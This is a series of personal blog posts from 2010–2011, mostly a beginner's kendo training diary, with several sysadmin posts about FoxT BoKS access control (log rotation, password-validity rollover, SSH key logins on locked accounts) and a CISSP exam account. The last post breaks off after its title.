I usually practice kendo at home once or twice a week, by myself, just stretching and doing suburi. Tonight made a nice difference with one of my sempai visiting for one-on-one training. We did suburi, went over kata #1 and the he let me practice some kihon on him wearing his bogu. Now, I need to remember the learning points we discovered today, because there were quite a few eye openers for me.

Thanks Martijn! I really appreciate your help and I enjoy our training tremendously.  m(__)m


kilala.nl tags: , ,

View or add comments (curr. 2)

Understanding more about our dojo

2011-04-11 22:28:00

Kendo is more than just hitting people with bamboo sticks. It entails strategy, philosophy and psychology. And of course plenty of history! Today I contacted our dojo's founder to start learning about our background. Heeren-sensei quickly told me where Furuya-sensei came from, which is a good enough starting point for me to start finding out more. 

In the mean time I've finally done something I'd been trying to do for a while: find out the elements that make up the name of our dojo to see how the name is composed and what it means.

On the website it says: "Reshinjuku: Training improves spirit and body". Sadly the Japanese name isn't included anywhere on the site except as a graphic at the top of the site, which makes looking up the relevant kanji quite a pain. But with half an hour of puzzling between Wikipedia, WWWJDIC and the iPhone app Kotoba! I managed to get it all together :)

So here we go!

I'd put that together as: "intensive training tempers the heart", or "school where the heart is trained". In this case "heart" is in the sense of the Japanese word 'kokoro', which describes a concept more than one single word. The "kendo" part at the end of course indicates what skills the school focuses on.

Next up? Trying to figure out the correct kanji for Furuya-sensei's name. Is it 古屋? Or is it 古谷? And which one of the nine spellings for "Isao" (his first name) is the correct one? ^_^ Once I've found that out, the real search for our school's background starts :)


kilala.nl tags: , ,

View or add comments (curr. 2)

Kendo kyu exams at Renshinjuku

2011-04-09 21:46:00

Today was an odd day at our dojo in Almere, not because of the examinations, but because of the atmosphere surrounding them. Usually we have a very strict schedule and everyone's pretty serious, but not today. Before the ceremony began there was lots of talking and joking inside the dojo, which by itself is pretty rare. But after the ceremonies were completed and the trainers were deliberating there was a lot of horseplay as well. Very weird, if like me you're used to a stern ambience. 

Anyway, the exam proceedings were cool! The students were lined up in groups, based on which grade they were testing for. First up were the mukyu, those without rank who were going for gokyu, which's a group of eight (myself included). We had to display men uchi, the basic strike for the head, in both the "large" and the "swift" versions. Of course we needed to show proper posture and form, as well as good kiai and fumikomi. The other groups were going for...

The groups for gokyu and yonkyu were also given a short written test, to verify our knowledge of basic kendo terminology and concepts.

In the end we were all allowed to pass our grades, to everybody's pleasure. Our most experienced student Charel also received his official ikkyu ranking, which he was tested for nationally earlier this year.

Personal feedback I received today was:

  1. I am showing clear progress.
  2. My posture in kamae is not nearly threatening enough.
  3. My upswing is cut short when I feel I am in a hurry.

kilala.nl tags: , ,

View or add comments (curr. 6)

SCP troubles: BoKS OpenSSH versus F-Secure

2011-04-06 00:01:00

It is not uncommon for network environments to mix different versions of SSH software, especially when you are still transitioning towards a BoKS-ified network. In such situations you'll often run into little snags that make the seemingly trivial rather impossible. Case in point: SCP (Secure Copy).

Whereas SSH and SFTP are standardized protocols that have been properly documented, SCP isn't so lucky. Sadly there is no such thing as a standard SCP and what "SCP" is depends completely on the SSH software you're using. The Wikipedia page linked above makes a very important point: "The SCP program is a software tool implementing the SCP protocol as a service daemon or client. It is a program to perform secure copying. The SCP server program is typically the same program as the SCP client."

Meaning that if you're using F-Secure on one side, it is going to expect F-Secure on the other side. If you try and have an OpenSSH client talk SCP to an F-Secure server, then you'll undoubtedly run into errors like these: "scp: FATAL: Executing ssh1 in compatibility mode failed (Check that scp1 is in your PATH)."

What if you're migrating an F-Secure-based environment to BoKS? There are a few possible solutions:

Option #2 is a bit redundant if you're going to be installing BoKS on the hosts later on. You might as well get it over with as soon as possible, you don't have to actively use BoKS from the get-go. Option #3 is a useful enough kludge, especially if there are servers that will never switch to BoKS.

See also:


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS: mind your log files!

2011-04-06 00:00:00

BoKS' main log file for transactions is $BOKS_data/LOG. The way BoKS handles this file is configured using the logadm command. Specifically, this is done using two distinct variables:

For example:

$ suexec logadm -V
Log file size limit before backup:       3000 kbytes
Absolute maximum log file size:          100000 kbytes

$ suexec logadm -lv
Primary log directory:                   /var/opt/boksm/data
Backup log directory:                    /var/opt/boksm/archives

What this means is that:

First off, this means that it's not just $BOKS_data that you need to monitor for free space! $BACKUP_dir is equally important because once the -M threshold is reached BoKS will simply stop logging. But then there's something else!

Did you know that BoKS is hard coded for a maximum of 64 log rotations per day? This is because the naming scheme of the rotated logs is: L$DATE[",#,%,',+,,,-,.,:,=,@A-Z,a-z]$DATE. Once BoKS reaches L$DATEz$DATE it will keep on re-using and overwriting that file because it cannot go any further! This means that you could potentially lose a lot of transaction logging.

The current work around for this problem is to set your logadm -T value large enough to prevent BoKS from ever reaching the "z" file (the 64th in line). Of course the real fix would be to switch to a different naming scheme that is more flexible and which allows a theoretically unlimited amount of log rotations.

The real fix has been requested from FoxT and is registered as RFC 081229-160335. This fix has been confirmed as being part of BoKS v6.6.1 (per build 13 I am told).


kilala.nl tags: , ,

View or add comments (curr. 0)

A tough workout today

2011-04-02 21:59:00

Today was a good class. A very good class. 

Let's see... What were the pointers that I need to remember? *ponders* 

I'll also start bringing some sturdy bandaids to class to quickly coverup peeling blisters. This morning I got a big one in a rather annoying spot, which I allowed to distract myself too much. A speedy patchjob would've helped me mentally. 

Uchikomi geiko was fun though :)


kilala.nl tags: , ,

View or add comments (curr. 3)

Upcoming kendo exam

2011-03-29 07:53:00

All kendoka from our dojo recently received an email from our instructors to partake in the upcoming exam rounds. Seeing how I only started kendo two months ago I asked our sensei about his expectations for us newbies. His reply: "Just take the exam. Like everything in life all beginnings are easy." So there we go :)

Now, seeing how I'm still a mukyu ("no rank") the test will simply be to see if I've been learning properly for the past few months and with any luck I'll be getting closer and closer to the lowest rank there is, rokkyu (sixth rank). The funny thing about the ranking below ikkyu (first rank) is that there are no standardized requirements for them. Starting from ikkyu and proceeding to shodan, nidan and so forth everything has been standardized by the IKF, but below those everyone's free to decide on their own requirements. Thus sometimes you'll have national federations deciding on the conditions (like Germany, South Africa and Australia), often it's a regional thing (like US states) and sometimes even at the dojo level (like this one from Belgium). Apparently in Japan the kyu grades below ikkyu are even only given out to children, with adults not getting anything until they are deemed worthy of ikkyu. As you can see, there are many different approaches to the kyu grades.

Reading through all those descriptions there's a thread that runs through all of them:

We'll see :) I'm looking forward to the ninth of April, simply because it'll be a special day at the dojo. I don't particularly care about the outcome of the exam since I'm not there for achievements/ranking, but to learn kendo.


kilala.nl tags: , ,

View or add comments (curr. 0)

A smaller kendo class

2011-03-28 07:45:00

This weekend's kendo class was a bit... weird, I guess. The group was very small, with only five people in bogu, with us four newbies in dogi or sweats and without our usual sensei. It was a productive and tiring class, but it seemed to lack coherence and rigour. We'll do better next time! ^_^

One big thing I took away from this lesson: posture.

Posture, posture, posture. Fukushou Hillen en Chris kept reminding me that I keep ducking, or bending backwards. Later on sempai Jeroen also noticed that I don't fully raise my shinai when striking, meaning that my left fist doesn't pass my face completely. Jeroen also immediately noticed something I'd been slightly aware of: when doing fumikomi I tend to keep my right foot very close to myself instead of really lunging forward. On the one hand this severly limits my range, on the other it ruins my fumikomi and my follow-through because I'm stomping my heel, instead of slapping my foot.

We were also informed that the 9th of april will be the next round of exams. I don't really know what sensei expects of us newbs who haven't even attained rokkyu yet, so I've fired off an email to him :)

Aside from the usual practice in the dojo I also try to get practice in at home. I run 2km twice or three times a week, train my lower arms with a Powerball I got years ago and I do suburi once of twice a week as well. Fun times! One very odd thing though: while I can run 1km without much trouble, the okuri-ashi warmups in the dojo really wear me out. Roughly 100m of sliding footwork at a rapid pace affects me more than 1km of jogging with intervals of running. Interesting ^_^;


kilala.nl tags: , ,

View or add comments (curr. 2)

Spirit and endurance: two things I need

2011-03-20 07:46:00

Yesterday's kendo class was great! In sensei Ton's absence fukushou Kris and Hillen took the lead with many basic exercises for everyone, followed by half an hour of serious sparring. 

The biggest things that stood out for me were not about technique, but all mental:

The first point is obvious: after the first 1.5 hours of training I was already quite tired. Going up against my seniors many of them managed to fire me up with comments and kiai, forcing me to show spirit again. Obviously I'll need to be able to do that without their aid.

The second point was driven home when Hille gave me the lead of a group exercise, where i was to sound off stepping directions. From my mannerisms he could read what my command was going to be before I called it out. Doh! That's called over-thinking on my side :)

After the training I felt absolutely great, which lasted for a few hours more. But when I'd taken a short nap in the afternoon I woke up with a headache that was something fierce! =_= Skipped dinner and went to bed at 1930


kilala.nl tags: , ,

View or add comments (curr. 2)

Fifth kendo training

2011-03-12 15:20:00

Whew! Today's kendo training was heavy!

While the whole two hours were spent on suburi ("empty strikes", that is individual practice as opposed to one-on-one training) it was very tiring for me. It was the first time for me to wear my hakama and gi in the dojo, which was interesting to say the least. The hakama was very comfortable, but I wasn't fully prepared for how warm the thick, cotton gi would get. Until now I've been wearing sweatpants and a longsleeve, which is a lot cooler. But now I was pooped within the first half hour :)

Aside from that, lessons learnt:

What a great class today. I was about ready to give up for a five minute break a few times, but I kept on going. Get a quick drink and catch my breath, then carry on immediately! 


kilala.nl tags: , ,

View or add comments (curr. 2)

Hooray for my sewing machine

2011-03-08 22:33:00

After getting my kendo uniform exchanged the fit was a lot better. The size 185 really was way too big for my 179 frame, but oddly even the size 180 was still too big. So out comes my trusty Pfaff! I spent the better part of last night measuring the legs of my hakama to the right length and then hemming them, followed by a re-ironing of the pleats. Now the fit is even better and I got to work with my hands again. And it sure beats paying a seamstress to do it for me!

I also had some time left, so I took the Ikea manga drapes down from my office wall and made a Godzilla tenugui for myself. Handy and good looking! :)


kilala.nl tags: , ,

View or add comments (curr. 1)

Finally, more kendo training

2011-02-27 11:24:00

After two missed trainings (illness and our Copenhagen trip) I finally went back to class yesterday. The effects of three weeks without proper training were very clear, because I was quite lost in my timing. I had to relearn all manner of things.

On the positive side of things, my striking motion has in fact improved since last time. About two weeks ago it finally "clicked" in my head. The reason why my strike was moving in an arc instead of a straighter line was because I was flicking my left wrist right from the start. Instead, what I have to do is first pull my left hand in a straight line, with the flick and the swing coming in much later. 

So... Stuff to focus on:

The stupid thing is that I keep getting the various suburi mixed up in regards on when to raise and when to strike, in relation to my footwork. Of course it's simply a matter of repetition to ensure that I memorize it. I think I'd better clean up the back yard a bit to provide the required space for my practice. There's only so much I can do in my study. 


kilala.nl tags: , ,

View or add comments (curr. 3)

Endorsement: I'd recommend Kendo 24

2011-02-21 21:24:00

Earlier I wrote a little about my shopping experience with Kendo 24. I'd like to take a little bit of time to write an actual endorsement, because their customer service is absolutely great. 

When i placed my first order I dillydallied a little bit about the size of my uniform. In the end I picked a size which I knew was slightly too big, assuming that it'd be easy to fix if it was -way- too big. Bernd was friendly and patient with me and promptly sent out my order. And when it did turn out that the uniform was waaay too big he had no problems at all with sending me a new uniform (with free shipping!) even before I'd returned my original order. At their prices, the cost-quality ratio is just perfect for a beginner. My next order will definitely be with them again. 


kilala.nl tags: ,

View or add comments (curr. 0)

Oww, pulled muscle's cramping my style

2011-02-05 20:13:00

Last week's training at was great and I enjoyed it a lot. The day after I realized that I might have enjoyed it just a little bit too much, because apparently I'd pulled a muscle in my left leg. Something running from my loin down the inside of my thigh. Either way, dumb me disregarded the problems and proceeded to attempt jogging to and from the office every day. Dumb :) Today it was still bothering me, to the point that I had to bow out twice, after sharp pains during practice. So, mental note to self: take it easy next week!

Both sensei Loyer and sempai Chris pointed out a few structural flaws in my technique, which I really need to work on. One has been obvious from the start, one was noticed only now. 

Another important point is that, when landing a point, I should properly stamp my right foot. However, today I avoided doing that because of my pulled muscle.

So! Practice, practice! Renshuu, renshuu!

Today I also asked the teacher if I could enroll as a student. I was originally told that everyone could have five free introductory weeks, after which one'd join the dojo. Instead I was told that he would, for now, not accept my enrollment and that I should simply proceed as we are right now. Sensei wanted to impress upon me that "kendo is not something you do for a year", so first he'd like to see me get through the first few months. Based on our short discussion I assume this is to our mutual benefit: for me so I am not forced to make social and monetary commitments and for the dojo so they first get to know me better before truly accepting me. It's certainly not what I expected, but I can agree with all the benefits involved with this approach. 

Finally, as I remarked last week: I really like the people in the group. At least one of them lives very close to me, so I gave him and his friend a ride back to Almere Buiten station. Given our proximity I see some definite opportunities for backyard training in spring and summer :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

My basic kendo gear has been ordered

2011-01-30 19:48:00

The graphic to the left is used on the Kendo24 website, to advertise their equipment sets for beginners. I can't help but giggle ^_^

Anyway... A hundred euros (or 114 including shipping) gets me everything I'll need for my first few months of kendo training. A hakama (special pants), a gi (jacket), a shinai (bamboo dueling sword) and a bokken (wooden sword for kata). Oh, and a baggie to put the swords in. That's a pretty good deal, though obviously none of it will be of stellar quality. Still, a hundred bob is certainly manageable as a starting point! 

Next up, I know it's not required and might be a bit weird, I'll write a short letter requesting our sensei to accept me as a student.


kilala.nl tags: , ,

View or add comments (curr. 2)

Second day of kendo at Renshinjuku

2011-01-29 18:58:00

All the running I've been doing the past year sure came in handy today! Aside from the usual stretching and jumping, today's warming-up also consisted of multiple laps around the gymnasium. Roughly 700m of running, sprinting, strafing and of course the kendo shuffles (forwards, reverse and sideways) would've certainly done me in two years ago but not now! :D

Speaking of the warming-up: aside from the fact that it's very useful, there is also something very cool about it. The last part consists of various jumps, jumping jacks and stomped landings, combined with counting. It really builds my fighting spirit (if you will) to have a gym filled with the roars of ichi-ni-SAN!, timed to jump-jump-THUMP! of twenty people. Like there's a giant bass drum in the room... ^_^

Anyway. I learnt a lot today. I still have the same problem as last week, where I strike with my whole arm instead of whipping the shinai with my left wrist. Aside from that I also tend to stoop a little, holding the shinai too low (below navel level). And there's one problem that's obvious for someone completely new to martial arts: I am hesitant to actually strike someone. Today we practiced the basic men strike and the kote-men strikes and only near the end of class would I actually start HITTING people, instead of tapping, glancing or tapping. 

All my sempai were very helpful and patient, with most everyone having a pointer or two. I enjoy training with this group a lot!

EDIT:

At least there's nothing wrong with my kiai. Finally my big lung capacity pays off and I can use my Voice Of Authority(tm) for something else, besides addressing crowds at the 'Anime 200x' festivals. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Tried a new sport today: kendo

2011-01-22 14:35:00

(C) H. Hofer, 2005

Today I did something new: I partook in kendo training. 

Recently I've been getting the "itch" to pick up sports again. i've been running between the office and the railway station every day, trying to build up some stamina again. This is going slowly, but it's working. But as I learnt last summer, I doubt that I'd want to go back to long endurance running again. Well, as Menno so succinctly pointed out: "there's never a dull moment in kendo!"

The way I see it, kendo will be beneficial to me in a number of areas. Obviously it's good exercise, there's no doubt about that. It will hopefully also teach me some mental endurance and some much-needed humility. Personally I love the rigor, the tradition and the ceremony, so that's a plus. And physically? I can only dream of ever becoming as fast as some of these folks! One fellow I practiced with would be able to get in five to seven blows for every one of mine. The light footedness! Amazing!

There is one snag though. If I ever want to progress beyond the mere basics, wear a bogu and actually start fighting, then I will need to get over myself and start wearing contact lenses. There is no way that my normal glasses will stand up to the blows. So either I purchase expensive, custom sports glasses, or I get my eyes lasered, or I get contacts. Seeing how contacts are the cheapest and least permanent option it's safest to go with that for now. 

The dojo in Almere, Renshinjuku, is an offshoot of a larger dojo in Amstelveen. There aren't that many kendo dojo in the Netherlands, but I appear to have lucked out with this one! For my taste the dojo has the right level of formality. I was dreading a group similar to my original archery group in Zutphen: no discipline, no rigor, just teenagers running wild. Luckily that is not the case at all! In the dressing room the atmosphere is jovial and informal, but once you go out to the training floor everybody gets serious.

I am really looking forward to next week's class.


kilala.nl tags: , ,

View or add comments (curr. 5)

AWW YEAH! I passed my CISSP exam!

2010-12-14 21:29:00

Aw yea!

Tonight, after weeks of waiting and finally getting fed up with it all, I finally got the liberating email from ISC2:

"Dear Thomas Sluyter:

Congratulations! We are pleased to inform you that you have passed the Certified Information Systems Security Professional (CISSP®) examination - the first step in becoming certified as a CISSP."

As predicted they never mention anything about my passing grade, but I made it. The six months of studying and cramming paid off! Also congratulations to my work buddy Patryck, who's also passed. Both of us, on our first try. /o/

Image blatantly ripped from Super Effective, which is awesome ^_^


kilala.nl tags: , , ,

View or add comments (curr. 7)

Finally! I've taken my CISSP exam

2010-11-14 07:40:00

A large room of people

It has been a very long time in coming, but yesterday I finally took my CISSP exam. I started preparing for my exam five months ago, but reading the big 1200 study guide from cover to cover. I've followed online classes and went to a week-long review class. And finally I took a few practice exams, both the ones included with the Harris book as well as those at CCCure.org. And finally, in the last week before the exam I read through an excellent CISSP summary, written by my colleague Maarten de Frankrijker (awesome work Maarten!).

All in all I felt pretty well prepared for the exam.

Yesterday I left home at seven and because I arrived at the exam site 1.5 hours early I quickly went to the market in nearby Nieuwegein to pick up some stuff and have a chat with old acquaintances. I arrived back at the exam site half an hour early, at 0830. While other people were still rifling through their study guides and summaries, I instead opted to simply read "The League of Extraordinary Gentlemen" ^_^ I mean, if you don't know the materials an hour before the exam, all the cramming in the world isn't going to help you :)

We started the exam at 1005 and I finished at 1310, so it took me almost exactly three hours including breaks. My strategy for the test? I divided the 250 questions into ten blocks of 25. For each block I answered the questions in the booklet, did a quick double check and then copied the answers to the answer sheet. I then took a one minute break, stretching, yawning and having a drink after which it was back to the next block of questions. After a hundred questions (so twice in the exam) I take a longer break, to walk around a little, to do some more stretching, to have a sandwich, etc. All in all, I made sure to remain relaxed at all times, assuming that pressure would only make me screw up questions.

Could I have used more time? Sure. Could I have gone over all 250 questions to see if I had made any mistakes? Sure. But I didn't. I felt right about the majority of questions I'd answered and figured that, if I -did- make any mistakes, I'd play the numbers game. How many questions would I have accidentally answered incorrectly? I feel that the chance is small. So, I was the first one to finish the exam and walk out of there. 

I'm very curious what the results will be! Unfortunately it'll take a while for the results to come in, a few weeks I'm told. 


kilala.nl tags: , ,

View or add comments (curr. 10)

Reinstalling the Macbook

2010-11-08 23:59:00

Well this doesn't happen very often: I've been forced to re-install my Macbook after two years of trusty service. The laptop was still functioning normally, but had begun to show glitches in file saving dialogs. A quick check with Disk Utility showed that there was corruption in the file systems's inode table and that (sadly) a format and restore were needed. 

Took me four hours in total to run a full backup, then perform a clean install, then return all my files to their original locations. Not too shabby, but I would've preferred to spend those four hours programming. Oh well...


kilala.nl tags: , ,

View or add comments (curr. 0)

Two nice tools for my daily workflow

2010-10-24 09:42:00

Evernote + EgretList

A month or so ago I started using Evernote, which could be described as a digital scrapbook-meets-notebook-meets-filestorage. The application and its basic use are free and available cross-platform, with a very nice web interface and client software for Mac OS X, Windows, iPhone OS, Blackberry and a few others. Anything that you add to your Evernote storage gets synchronized to all of your devices automatically. This means that the notes I took during my CISSP class were synced to my iPhone and that the web clippings I made at home can also be read online. And so on. It really is a nice service and there's no beating the price!

Evernote also have a paid service, which adds extra functionality to your account. Your file storage space gets increased, the search function indexes any PDFs you store and your mobile Evernote client will be able to store all of your notebooks locally (instead of accessing them through Wifi or 3G). At $45 a year I wouldn't say the value's bad. So far Evernote's been very, very helpful to me.

Helpful how? Well, currently I have two distinct workflows I rely on heavily. On the one hand there's my studies for my CISSP exam and my security research. On the other hand there's my preparations for the BoKS course I will be teaching in a week. Since Evernote allows me to create multiple scrapbooks, it's a cinch to grab any Wiki pages I like, as well as any security PDFs and store them together with my CISSP class notes and my ToDo list. Similarly, for the training I have an easy ToDo list, many notes from teleconf phone calls and suggestions for new exam questions. All neatly taggable, searchable and editable. 

Speaking of ToDo lists: I have combined my Evernote account with the stunningly beautiful EgretList iPhone app. EgretList logs into your Evernote account and searches all your notes for any and all (un)finished ToDo items. These ToDo items are sorted by their Evernote categories and notebooks and presented as a faux Moleskine notebook. So instead of having to search through many different Evernote notes to check/unckeck a ToDo item, you can easily do it through EgretList. Lovely :)


kilala.nl tags: , , ,

View or add comments (curr. 3)

Holy crap Apple! Way to up the bar!

2010-10-20 20:48:00

The new Macbook Air

Wow. Just, wow. 

Tonight Steve Jobs got on stage and, among many other nice things, announced the new Macbook Air range for 2010. I was going "Nice, nice..." while he was going down the spec list, then I went "WHOA HOLY SH!T!!!" when he announced the price point: $999 for the base model which has an 11.6" screen and weighs in at -literally- one kilogram. 

Yeah. The next business laptop I'm getting? It's -that- one. If I ever need on-the-road virtualization I'll just run the VMs at home and access them through remote desktop.

EDIT:

Ah! And here is the iFixit tear-down of the new MBA


kilala.nl tags: , ,

View or add comments (curr. 7)

How to slow down your file copies

2010-10-19 22:49:00

While preparing for a course I will be teaching in two weeks time I need to set up some virtual machines for the practice labs. All of these run on Sun's VirtualBox and FoxT has provided me with a USB disk filled with the appropriate disk images. I bought two extra USB drives, so we could set up the student's computers faster (three drives instead of one to pass around the files). 

But that's where the crap starts. You see, if I'm not mistaken all the students will use Windows boxen. I have a Mac. All the virtual machine disk images are big, between 10GB and 22GB. 

Now, the only file system that is 100% read+write out of the box between Windows and Mac OS X is the aged FAT32. And no, FAT32 does not support any files over 4GB in size. Crap :(

This means that:

  1. I have formatted my extra USB drives as NTFS, using Windows XP running in a Parallels virtual machine.
  2. I have installed MacFUSE and NTFS-3G on my Mac, to enable it to write to NTFS.
  3. I am now copying 200GB of disk images from one USB drive to the other.

Because USB is CPU-bound and because the NTFS-3G driver is experimental this ordeal constantly takes up 27% of my 200% CPU time (dual core) and the actual copy will take roughly four hours. Damn!

I think I'll quit the copy and be more selective about the disk images that I copy. :) 


kilala.nl tags: , , ,

View or add comments (curr. 0)

From the rumor mill: features for BoKS 6.x and 7.x

2010-09-16 00:00:00

A few weeks ago we met with two of FoxT's VPs who'd come over from the US to Amsterdam. During our two hour meeting we were told of many awesome features to be expected in future versions of BoKS (or "FoxT Access Control" :) ).

The future looks bright! I for one can't wait to get my hands on 6.6.x to start testing and learning! :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Security problems: password entropy versus reuse

2010-09-14 22:24:00

An interesting security conversation

Comic continues here

As a security guy this comic makes 100% sense and it is in fact a very likely scenario. It is also the one reason why we (Marli and I) never use the same password twice, either between accounts or when rotating them semi-frequently.


kilala.nl tags: , ,

View or add comments (curr. 0)

I spent a week in boot camp

2010-09-10 22:43:00

CISSP course books

You may recall that I started studying for my CISSP certification sometime in June. Since then I spent two months reading the 1200 page course book cover-to-cover, learning a lot of new things about the field of IT security. It was a chore getting through the book, but it's been very educational!

Last week I finally finished the last chapter, just in time for this week's "boot camp" week. Instead of using the five days of class learning things from scratch, I came prepared and only used the class to pinpoint any weak points in my knowledge and experience. Five days, forty hours of dry theory and many discussions later I now have a list of roughly 50 "TODO" items to tend to before my examination.

The exam is slated for the 13th of November and will take all of six hours. I'm actually a bit afraid that the remaining two months will be too long for me. I'll need a few weeks to kill all the "TODO" items, which will then leave me with a few more weeks before the exam. I could keep on cramming, I could get started on my next certs/studies, I could get some programming done, or I could simply unwind. I don't know... I'm afraid of letting all the info I've gathered slip from my head either way.


kilala.nl tags: , ,

View or add comments (curr. 0)

What's in a name? FoxT product renaming

2010-08-31 00:00:00

Over the past fifteen years the product we've come to know and love has changed names on numerous occasions. BoKS has changed hands a few times and with each move came a new name. All of this has led to a rather muddled position in the market, with many people confused about what to call the software.

Is it "BoKS"? Is it "FoxT Access Control", or "Keon", or even "UnixControl"? And is the company called FoxT or is it Fox Technologies?! And this confusion isn't alleviated by the fact that both resumés and job postings refer to the software by any of these names.

Now we are told that FoxT are seriously considering a rigorous change to their naming convention, one that they will stick with for the coming years. All we can say is that it'd better be good! Because most of the names tossed about so far have both up and downsides.

Things like Access Control, Unix Control, or Server Control all have the problem that they are names consisting of two very generic words. Run them through Google and you'll get oodles of results. Words like FoxT and BoKS are certainly far from generic, but even those give pretty bad results in Google ("Did you mean books?"). BoKS is certainly a memorable term and most people still refer to the software in that way, despite the fact that neither the FoxT documentation nor their website even still mentions the name.

So far the only past name that ticks all the boxes (unique, memorable, great with SEO) is "Keon". But unfortunately that can't be used, because the name is still owned by RSA. :(

So, what do you think?! Any suggestions with regards to a new product name? Any emotional attachment to the name "BoKS" (I'll admit to having that flaw)? Pipe in and let us know!


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS and the epoch rollover

2010-08-20 00:00:00

 

The year 2038 is still a long time away, but we may already be feeling its effects!

As any Unix administrator will know Unix systems count their time and date in the amount of seconds passed since "Epoch" (01/01/1970). On 32-bit architectures this means that we're bound to "run out of time" on the 19th of January of 2038 because after that the Unix clock will roll-over from 1111111.11111111.1111111.11111110 to 10000000.00000000.00000000.00000000.

While you might not expect it, BoKS administrators may already be feeling the effects of the Year 2038 problem way ahead of time.

One commonly used trick for applicative user accounts is to set their "pswvalidtime" to a very large number. This means that the user account in question will never be bugged to change its password, which tends to keep application support people happy. The account will never be locked automatically because they forgot to change the password and thus their applications will not crash unexpectedly.

It's common to use the figure "9999" as this huge number for "pswvalidtime". This roughly corresponds to 27,3 years. Do the rough math: 2010,8 + 27,3 = 2038,1. Combine that with the "pswgracetime" setting and BINGO! The password validity for the user in question has now rolled over to some day in January of 1970! The odd thing is that the BoKS "lsbks" command will not show this fact, but instead translate the date to the relating date in 2038, which puts you off the track of the real problem.

So... If you happen to rely on huge "pswvalidtime" settings, you'd better tone it down a little bit. Thanks to the guys at FoxT for quickly pinpointing our "problem". It seems that there's a 9999-epidemic going round :)

EDIT: Thank you to Wilfrid for pointing out two small mistakes :)

 


kilala.nl tags: , ,

View or add comments (curr. 0)

In BoKS, "locked" does not always mean an account is locked

2010-07-28 21:37:00

I ran into a rather interesting case the other day, pointing me to another caveat that you need to keep in mind with BoKS. Let me say up front that I understand FoxT's design decision in this case and that, while I don't necessarily agree with them, it isn't a very big problem as long as you know the situation exists. So, what's up?

In BoKS, a "locked" account is not always locked the way you might think it is.


How I found out that "locked" isn't always "locked"

I received a trouble ticket from a friend/colleague of mine, saying that he suspects his application user got locked. He couldn't SU to the user account anymore, getting a message saying it was locked. Either way, his password wasn't getting accepted and he needed to get in!

So, I checked the application user and it was fine! Not locked, no expired password, no problems at all. However, the BoKS logs did show that my friend's account was in fact blocked! Browsing back through the transaction logs I found that his personal account had been locked after he'd entered a wrong password while SU-ing. In the world of BoKS this makes sense: you try to guess your way into another account with SU and your own account gets locked as a punishment. This way you can block the perpetrator, while preventing a DoS (Denial of Service) on the target account.

07/07/10 17:05:50 SERVER-A pts/2 bobby sshd Successful login (ssh shell from 10.72.2.3)
07/07/10 17:05:58 SERVER-A pts/2 bobby su Successful SU from user bobby to oracle
07/08/10 03:48:30 SERVER-A pts/2 bobby sshd Logout
07/08/10 11:02:35 SERVER-B - bobby sshd Bad login (ssh auth from 10.72.2.3). Wrong password.
07/08/10 15:05:13 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Authentication failed.
07/08/10 15:05:16 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Wrong password.
07/08/10 15:05:19 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Wrong password.
07/08/10 15:05:26 SERVER-C - bobby servc Too many failed login retries on SERVER-C
07/08/10 15:05:26 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Wrong password.
07/08/10 15:05:30 SERVER-C - bobby sshd Bad login (ssh auth from 10.72.2.3). Too many erroneous login attempts.
07/13/10 08:22:47 SERVER-B pts/1 bobby sshd Successful login (ssh shell from 10.72.2.3)
07/13/10 11:14:15 SERVER-B pts/1 bobby su Access denied by server 10.72.2.3, route SU:bobby@pts/1->oracle@SERVER-B
07/13/10 11:14:15 SERVER-B pts/1 bobby su Bad SU from user bobby to oracle (Too many erroneous login attempts.)
07/14/10 15:52:34 SERVER-B pts/1 bobby sshd Logout
07/15/10 08:12:49 SERVER-B pts/1 bobby sshd Successful login (ssh shell from 10.72.2.3)
07/15/10 10:24:50 SERVER-B pts/2 bobby sshd Successful login (ssh shell from 10.72.2.3)

In the case above, "bobby" locked his account by repeatedly botching his own password on a system where he hadn't installed his SSH keys yet.

So how come my colleague could still login using SSH? Didn't BoKS say his user account was blocked?!


Design decision: SSH key authentication ignores "locked" status

I was flabbergasted! Bobby's account had gotten locked, so certainly he should not be allowed to login anymore, right? Besides, he was getting blocked on his SU and SUEXEC usage! So why could he still login?

After discussing the matter with FoxT tech support I was reminded of the aforementioned design decision regarding DoS attacks: FoxT doesn't want you to easily block another person's account by just slamming his password. Which is why they decided that anybody who is allowed to use SSH key pairs should also be allowed to keep logging in despite his "locked" status.

Two very important distinctions:

  1. This does not apply to manual account locks! So if an administrator locks an account, the account will not be allowed to login at all, SSK keys or not.
  2. Also, to quote my contact at FoxT: Also, a successful key-based login will not reset the failed password count of the account and will not open up additional opportunity for an attacker to keep trying the password. Both, very important.

kilala.nl tags: , ,

View or add comments (curr. 0)

FoxT BoKS training and documentation

2010-07-06 19:25:00

I've been asked multiple times who can provide training or education about FoxT's BoKS Access Control. The most obvious answer is: "it depends on where you live".

FoxT has many local partners across the globe, offering many different services. Project management, consulting, administration and training, the works! Who these local partners are depends on the continent and/or country you're in.

In the case of the Benelux (Belgium, Netherlands and Luxemburg) there are two answers.

  1. You can hire FoxT to come down from Sweden
  2. You can hire Unixerius, the only local partner for BoKS training.

For information about local training partners in your locale, please contact FoxT.


kilala.nl tags: , ,

View or add comments (curr. 0)

End of life for BoKS 5.x, 6.0 and 6.1

2010-06-19 00:00:00

 

A few months ago FoxT made their official announcement regarding the EOL-ing of various BoKS versions within the next 1.5 years.

Per the 31st of December 2010, the following products will no longer receive support.

Also, per the 31st of December 2011, the following products will no longer receive support.

Per the aforementioned dates "no more maintenance updates or patches will be made available and no further development will take place for these particular components. In addition, the affected components will no longer be supported by FoxT Customer Support".

Please keep these dates in mind and plan your upgrade paths accordingly! You don't want to get stuck with an unsupported version of the software because you'll miss out on critical software updates and tech support costs will go through the roof. Then again, in this day and age, why are you still running a version < 6.0?!

Gentlemen, start your upgrades!

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Digital content delivery: I believe in it

2010-06-11 18:25:00

iPads as e-readers

